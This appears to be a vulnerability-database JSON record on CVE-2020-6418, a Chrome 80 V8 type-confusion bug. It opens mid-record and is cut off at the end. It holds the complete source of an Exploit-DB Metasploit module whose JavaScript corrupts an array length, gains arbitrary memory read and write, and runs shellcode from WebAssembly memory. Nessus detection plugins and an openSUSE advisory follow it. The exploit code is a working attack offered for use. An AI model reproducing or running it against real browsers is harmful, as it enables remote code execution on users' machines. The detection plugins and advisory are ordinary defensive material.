"AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-08-16T06:07:32", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", 
"attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-03-09T00:00:00", "type": "exploitdb", "title": "Google Chrome 80 - JSCreate Side-effect Type Confusion (Metasploit)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2020-6418", "CVE-2020-6418"], "modified": "2020-03-09T00:00:00", "id": "EDB-ID:48186", "href": "https://www.exploit-db.com/exploits/48186", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ManualRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Exploit::Remote::HttpServer\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Google Chrome 80 JSCreate side-effect type confusion exploit',\r\n 'Description' => %q{\r\n This module exploits an issue in Google Chrome 80.0.3987.87 (64 bit). 
The exploit\r\n corrupts the length of a float array (float_rel), which can then be used for out\r\n of bounds read and write on adjacent memory.\r\n The relative read and write is then used to modify a UInt64Array (uint64_aarw)\r\n which is used for read and writing from absolute memory.\r\n The exploit then uses WebAssembly in order to allocate a region of RWX memory,\r\n which is then replaced with the payload shellcode.\r\n The payload is executed within the sandboxed renderer process, so the browser\r\n must be run with the --no-sandbox option for the payload to work correctly.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'Cl\u00e9ment Lecigne', # discovery\r\n 'Istv\u00e1n Kurucsai', # exploit\r\n 'Vignesh S Rao', # exploit\r\n 'timwr', # metasploit copypasta\r\n ],\r\n 'References' => [\r\n ['CVE', '2020-6418'],\r\n ['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=1053604'],\r\n ['URL', 'https://blog.exodusintel.com/2020/02/24/a-eulogy-for-patch-gapping'],\r\n ['URL', 'https://ray-cp.github.io/archivers/browser-pwn-cve-2020-6418%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90'],\r\n ],\r\n 'Arch' => [ ARCH_X64 ],\r\n 'DefaultTarget' => 0,\r\n 'Targets' =>\r\n [\r\n ['Windows 10 - Google Chrome 80.0.3987.87 (64 bit)', {'Platform' => 'win'}],\r\n ['macOS - Google Chrome 80.0.3987.87 (64 bit)', {'Platform' => 'osx'}],\r\n ],\r\n 'DisclosureDate' => 'Feb 19 2020'))\r\n register_advanced_options([\r\n OptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information during exploitation\", false]),\r\n ])\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n if datastore['DEBUG_EXPLOIT'] && request.uri =~ %r{/print$*}\r\n print_status(\"[*] #{request.body}\")\r\n send_response(cli, '')\r\n return\r\n end\r\n\r\n print_status(\"Sending #{request.uri} to #{request['User-Agent']}\")\r\n escaped_payload = Rex::Text.to_unescape(payload.raw)\r\n jscript = %Q^\r\nvar shellcode = unescape(\"#{escaped_payload}\");\r\n\r\n// HELPER FUNCTIONS\r\nlet 
conversion_buffer = new ArrayBuffer(8);\r\nlet float_view = new Float64Array(conversion_buffer);\r\nlet int_view = new BigUint64Array(conversion_buffer);\r\nBigInt.prototype.hex = function() {\r\n return '0x' + this.toString(16);\r\n};\r\nBigInt.prototype.i2f = function() {\r\n int_view[0] = this;\r\n return float_view[0];\r\n}\r\nBigInt.prototype.smi2f = function() {\r\n int_view[0] = this << 32n;\r\n return float_view[0];\r\n}\r\nNumber.prototype.f2i = function() {\r\n float_view[0] = this;\r\n return int_view[0];\r\n}\r\nNumber.prototype.f2smi = function() {\r\n float_view[0] = this;\r\n return int_view[0] >> 32n;\r\n}\r\n\r\nNumber.prototype.fhw = function() {\r\n float_view[0] = this;\r\n return int_view[0] >> 32n;\r\n}\r\n\r\nNumber.prototype.flw = function() {\r\n float_view[0] = this;\r\n return int_view[0] & BigInt(2**32-1);\r\n}\r\n\r\nNumber.prototype.i2f = function() {\r\n return BigInt(this).i2f();\r\n}\r\nNumber.prototype.smi2f = function() {\r\n return BigInt(this).smi2f();\r\n}\r\n\r\nfunction hex(a) {\r\n return a.toString(16);\r\n}\r\n\r\n//\r\n// EXPLOIT\r\n//\r\n\r\n// the number of holes here determines the OOB write offset\r\nlet vuln = [0.1, ,,,,,,,,,,,,,,,,,,,,,, 6.1, 7.1, 8.1];\r\nvar float_rel; // float array, initially corruption target\r\nvar float_carw; // float array, used for reads/writes within the compressed heap\r\nvar uint64_aarw; // uint64 typed array, used for absolute reads/writes in the entire address space\r\nvar obj_leaker; // used to implement addrof\r\nvuln.pop();\r\nvuln.pop();\r\nvuln.pop();\r\n\r\nfunction empty() {}\r\n\r\nfunction f(nt) {\r\n // The compare operation enforces an effect edge between JSCreate and Array.push, thus introducing the bug\r\n vuln.push(typeof(Reflect.construct(empty, arguments, nt)) === Proxy ? 
0.2 : 156842065920.05);\r\n for (var i = 0; i < 0x10000; ++i) {};\r\n}\r\n\r\nlet p = new Proxy(Object, {\r\n get: function() {\r\n vuln[0] = {};\r\n float_rel = [0.2, 1.2, 2.2, 3.2, 4.3];\r\n float_carw = [6.6];\r\n uint64_aarw = new BigUint64Array(4);\r\n obj_leaker = {\r\n a: float_rel,\r\n b: float_rel,\r\n };\r\n\r\n return Object.prototype;\r\n }\r\n});\r\n\r\nfunction main(o) {\r\n for (var i = 0; i < 0x10000; ++i) {};\r\n return f(o);\r\n}\r\n\r\n// reads 4 bytes from the compressed heap at the specified dword offset after float_rel\r\nfunction crel_read4(offset) {\r\n var qw_offset = Math.floor(offset / 2);\r\n if (offset & 1 == 1) {\r\n return float_rel[qw_offset].fhw();\r\n } else {\r\n return float_rel[qw_offset].flw();\r\n }\r\n}\r\n\r\n// writes the specified 4-byte BigInt value to the compressed heap at the specified offset after float_rel\r\nfunction crel_write4(offset, val) {\r\n var qw_offset = Math.floor(offset / 2);\r\n // we are writing an 8-byte double under the hood\r\n // read out the other half and keep its value\r\n if (offset & 1 == 1) {\r\n temp = float_rel[qw_offset].flw();\r\n new_val = (val << 32n | temp).i2f();\r\n float_rel[qw_offset] = new_val;\r\n } else {\r\n temp = float_rel[qw_offset].fhw();\r\n new_val = (temp << 32n | val).i2f();\r\n float_rel[qw_offset] = new_val;\r\n }\r\n}\r\n\r\nconst float_carw_elements_offset = 0x14;\r\n\r\nfunction cabs_read4(caddr) {\r\n elements_addr = caddr - 8n | 1n;\r\n crel_write4(float_carw_elements_offset, elements_addr);\r\n print('cabs_read4: ' + hex(float_carw[0].f2i()));\r\n res = float_carw[0].flw();\r\n // TODO restore elements ptr\r\n return res;\r\n}\r\n\r\n\r\n// This function provides arbitrary within read the compressed heap\r\nfunction cabs_read8(caddr) {\r\n elements_addr = caddr - 8n | 1n;\r\n crel_write4(float_carw_elements_offset, elements_addr);\r\n print('cabs_read8: ' + hex(float_carw[0].f2i()));\r\n res = float_carw[0].f2i();\r\n // TODO restore elements ptr\r\n return 
res;\r\n}\r\n\r\n// This function provides arbitrary write within the compressed heap\r\nfunction cabs_write4(caddr, val) {\r\n elements_addr = caddr - 8n | 1n;\r\n\r\n temp = cabs_read4(caddr + 4n | 1n);\r\n print('cabs_write4 temp: '+ hex(temp));\r\n\r\n new_val = (temp << 32n | val).i2f();\r\n\r\n crel_write4(float_carw_elements_offset, elements_addr);\r\n print('cabs_write4 prev_val: '+ hex(float_carw[0].f2i()));\r\n\r\n float_carw[0] = new_val;\r\n // TODO restore elements ptr\r\n return res;\r\n}\r\n\r\nconst objleaker_offset = 0x41;\r\nfunction addrof(o) {\r\n obj_leaker.b = o;\r\n addr = crel_read4(objleaker_offset) & BigInt(2**32-2);\r\n obj_leaker.b = {};\r\n return addr;\r\n}\r\n\r\nconst uint64_externalptr_offset = 0x1b; // in 8-bytes\r\n\r\n// Arbitrary read. We corrupt the backing store of the `uint64_aarw` array and then read from the array\r\nfunction read8(addr) {\r\n faddr = addr.i2f();\r\n t1 = float_rel[uint64_externalptr_offset];\r\n t2 = float_rel[uint64_externalptr_offset + 1];\r\n float_rel[uint64_externalptr_offset] = faddr;\r\n float_rel[uint64_externalptr_offset + 1] = 0.0;\r\n\r\n val = uint64_aarw[0];\r\n\r\n float_rel[uint64_externalptr_offset] = t1;\r\n float_rel[uint64_externalptr_offset + 1] = t2;\r\n return val;\r\n}\r\n\r\n// Arbitrary write. 
We corrupt the backing store of the `uint64_aarw` array and then write into the array\r\nfunction write8(addr, val) {\r\n faddr = addr.i2f();\r\n t1 = float_rel[uint64_externalptr_offset];\r\n t2 = float_rel[uint64_externalptr_offset + 1];\r\n float_rel[uint64_externalptr_offset] = faddr;\r\n float_rel[uint64_externalptr_offset + 1] = 0.0;\r\n\r\n uint64_aarw[0] = val;\r\n\r\n float_rel[uint64_externalptr_offset] = t1;\r\n float_rel[uint64_externalptr_offset + 1] = t2;\r\n return val;\r\n}\r\n\r\n// Given an array of bigints, this will write all the elements to the address provided as argument\r\nfunction writeShellcode(addr, sc) {\r\n faddr = addr.i2f();\r\n t1 = float_rel[uint64_externalptr_offset];\r\n t2 = float_rel[uint64_externalptr_offset + 1];\r\n float_rel[uint64_externalptr_offset - 1] = 10;\r\n float_rel[uint64_externalptr_offset] = faddr;\r\n float_rel[uint64_externalptr_offset + 1] = 0.0;\r\n\r\n for (var i = 0; i < sc.length; ++i) {\r\n uint64_aarw[i] = sc[i]\r\n }\r\n\r\n float_rel[uint64_externalptr_offset] = t1;\r\n float_rel[uint64_externalptr_offset + 1] = t2;\r\n}\r\n\r\n\r\nfunction get_compressed_rw() {\r\n\r\n for (var i = 0; i < 0x10000; ++i) {empty();}\r\n\r\n main(empty);\r\n main(empty);\r\n\r\n // Function would be jit compiled now.\r\n main(p);\r\n\r\n print(`Corrupted length of float_rel array = ${float_rel.length}`);\r\n}\r\n\r\nfunction get_arw() {\r\n get_compressed_rw();\r\n print('should be 0x2: ' + hex(crel_read4(0x15)));\r\n let previous_elements = crel_read4(0x14);\r\n //print(hex(previous_elements));\r\n //print(hex(cabs_read4(previous_elements)));\r\n //print(hex(cabs_read4(previous_elements + 4n)));\r\n cabs_write4(previous_elements, 0x66554433n);\r\n //print(hex(cabs_read4(previous_elements)));\r\n //print(hex(cabs_read4(previous_elements + 4n)));\r\n\r\n print('addrof(float_rel): ' + hex(addrof(float_rel)));\r\n uint64_aarw[0] = 0x4142434445464748n;\r\n}\r\n\r\nfunction rce() {\r\n function get_wasm_func() {\r\n var 
importObject = {\r\n imports: { imported_func: arg => print(arg) }\r\n };\r\n bc = [0x0, 0x61, 0x73, 0x6d, 0x1, 0x0, 0x0, 0x0, 0x1, 0x8, 0x2, 0x60, 0x1, 0x7f, 0x0, 0x60, 0x0, 0x0, 0x2, 0x19, 0x1, 0x7, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x73, 0xd, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x0, 0x3, 0x2, 0x1, 0x1, 0x7, 0x11, 0x1, 0xd, 0x65, 0x78, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x1, 0xa, 0x8, 0x1, 0x6, 0x0, 0x41, 0x2a, 0x10, 0x0, 0xb];\r\n wasm_code = new Uint8Array(bc);\r\n wasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), importObject);\r\n return wasm_mod.exports.exported_func;\r\n }\r\n\r\n let wasm_func = get_wasm_func();\r\n // traverse the JSFunction object chain to find the RWX WebAssembly code page\r\n let wasm_func_addr = addrof(wasm_func);\r\n let sfi = cabs_read4(wasm_func_addr + 12n) - 1n;\r\n print('sfi: ' + hex(sfi));\r\n let WasmExportedFunctionData = cabs_read4(sfi + 4n) - 1n;\r\n print('WasmExportedFunctionData: ' + hex(WasmExportedFunctionData));\r\n\r\n let instance = cabs_read4(WasmExportedFunctionData + 8n) - 1n;\r\n print('instance: ' + hex(instance));\r\n\r\n let wasm_rwx_addr = cabs_read8(instance + 0x68n);\r\n print('wasm_rwx_addr: ' + hex(wasm_rwx_addr));\r\n\r\n // write the shellcode to the RWX page\r\n while(shellcode.length % 4 != 0){\r\n shellcode += \"\\u9090\";\r\n }\r\n\r\n let sc = [];\r\n\r\n // convert the shellcode to BigInt\r\n for (let i = 0; i < shellcode.length; i += 4) {\r\n sc.push(BigInt(shellcode.charCodeAt(i)) + BigInt(shellcode.charCodeAt(i + 1) * 0x10000) + BigInt(shellcode.charCodeAt(i + 2) * 0x100000000) + BigInt(shellcode.charCodeAt(i + 3) * 0x1000000000000));\r\n }\r\n\r\n writeShellcode(wasm_rwx_addr,sc);\r\n\r\n print('success');\r\n wasm_func();\r\n}\r\n\r\n\r\nfunction exp() {\r\n get_arw();\r\n rce();\r\n}\r\n\r\nexp();\r\n^\r\n\r\n if datastore['DEBUG_EXPLOIT']\r\n debugjs = %Q^\r\nprint = function(arg) 
{\r\n var request = new XMLHttpRequest();\r\n request.open(\"POST\", \"/print\", false);\r\n request.send(\"\" + arg);\r\n};\r\n^\r\n jscript = \"#{debugjs}#{jscript}\"\r\n else\r\n jscript.gsub!(/\\/\\/.*$/, '') # strip comments\r\n jscript.gsub!(/^\\s*print\\s*\\(.*?\\);\\s*$/, '') # strip print(*);\r\n end\r\n\r\n html = %Q^\r\n<html>\r\n<head>\r\n<script>\r\n#{jscript}\r\n</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n ^\r\n send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})\r\n end\r\n\r\nend", "sourceHref": "https://www.exploit-db.com/download/48186", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-01-11T15:07:09", "description": "This update for chromium fixes the following issues :\n\nChromium was updated to version 80.0.3987.122 (bsc#1164828).\n\nSecurity issues fixed :\n\n - CVE-2020-6418: Fixed a type confusion in V8 (bsc#1164828).\n\n - CVE-2020-6407: Fixed an OOB memory access in streams (bsc#1164828).\n\n - Fixed an integer overflow in ICU (bsc#1164828).\n\nNon-security issues fixed :\n\n - Dropped the sandbox binary as it should not be needed anymore (bsc#1163588).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-02-28T00:00:00", "type": "nessus", "title": "openSUSE Security Update : chromium (openSUSE-2020-259)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6407", "CVE-2020-6418"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromedriver-debuginfo", "p-cpe:/a:novell:opensuse:chromium", "p-cpe:/a:novell:opensuse:chromium-debuginfo", "p-cpe:/a:novell:opensuse:chromium-debugsource", "cpe:/o:novell:opensuse:15.1"], "id": "OPENSUSE-2020-259.NASL", "href": "https://www.tenable.com/plugins/nessus/134157", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2020-259.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134157);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2020-6407\", \"CVE-2020-6418\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0023\");\n\n script_name(english:\"openSUSE Security Update : chromium (openSUSE-2020-259)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for chromium fixes the following issues :\n\nChromium was updated to version 80.0.3987.122 (bsc#1164828).\n\nSecurity issues fixed :\n\n - CVE-2020-6418: Fixed a type confusion in V8\n (bsc#1164828).\n\n - CVE-2020-6407: Fixed an OOB memory access in streams\n (bsc#1164828).\n\n - Fixed an integer overflow in ICU 
(bsc#1164828).\n\nNon-security issues fixed :\n\n - Dropped the sandbox binary as it should not be needed\n anymore (bsc#1163588).\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1163484\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1163588\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1164828\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected chromium packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 80 JSCreate side-effect type confusion exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/02/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/02/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromedriver-80.0.3987.122-lp151.2.66.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromedriver-debuginfo-80.0.3987.122-lp151.2.66.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromium-80.0.3987.122-lp151.2.66.1\", allowmaj:TRUE) ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromium-debuginfo-80.0.3987.122-lp151.2.66.1\", allowmaj:TRUE) ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromium-debugsource-80.0.3987.122-lp151.2.66.1\", allowmaj:TRUE) ) flag++;\n\nif 
(flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:17:11", "description": "The version of Microsoft Edge (Chromium) installed on the remote Windows host is prior to 80.0.361.62. It is, therefore, affected by multiple vulnerabilities:\n\n - An out-of-bounds memory access error exists in Google Chrome. An unauthenticated, remote attacker can exploit this, via a crafted HTML page, to potentially exploit heap corruption. (CVE-2020-6407)\n\n - A type confusion error exists in the V8 component of Google Chrome. An unauthenticated, remote attacker can exploit this, via a crafted HTML page, to potentially exploit heap corruption. 
(CVE-2020-6418)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-07-07T00:00:00", "type": "nessus", "title": "Microsoft Edge (Chromium) < 80.0.361.62 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6407", "CVE-2020-6418"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:microsoft:edge"], "id": "MICROSOFT_EDGE_CHROMIUM_80_0_361_62.NASL", "href": "https://www.tenable.com/plugins/nessus/138176", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138176);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-6407\", \"CVE-2020-6418\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0023\");\n\n script_name(english:\"Microsoft Edge (Chromium) < 80.0.361.62 Multiple Vulnerabilities\");\n\n 
script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an web browser installed that is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Microsoft Edge (Chromium) installed on the remote Windows host is prior to 80.0.361.62. It is,\ntherefore, affected by multiple vulnerabilities:\n\n - An out-of-bounds memory access error exists in Google Chrome. An unauthenticated, remote attacker can\n exploit this, via a crafted HTML page, to potentially exploit heap corruption. (CVE-2020-6407)\n\n - A type confusion error exists in the V8 component of Google Chrome. An unauthenticated, remote attacker\n can exploit this, via a crafted HTML page, to potentially exploit heap corruption. (CVE-2020-6418)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n # https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV200002\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b4f0f972\");\n # https://docs.microsoft.com/en-us/deployedge/microsoft-edge-relnotes-security\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2ec7f076\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Microsoft Edge (Chromium) 80.0.361.62 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-6407\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n 
script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 80 JSCreate side-effect type confusion exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/02/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"microsoft_edge_chromium_installed.nbin\");\n script_require_keys(\"installed_sw/Microsoft Edge (Chromium)\", \"SMB/Registry/Enumerated\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\n\napp_info = vcf::get_app_info(app:'Microsoft Edge (Chromium)', win_local:TRUE);\n\nconstraints = [{ 'fixed_version' : '80.0.361.62' }];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:06:06", "description": "The version of Google Chrome installed is prior to 80.0.3987.122. 
It is, therefore, affected by multiple vulnerabilities as referenced in the 2020_02_stable-channel-update-for-desktop_24 advisory.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-02-26T00:00:00", "type": "nessus", "title": "Google Chrome < 80.0.3987.122 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", 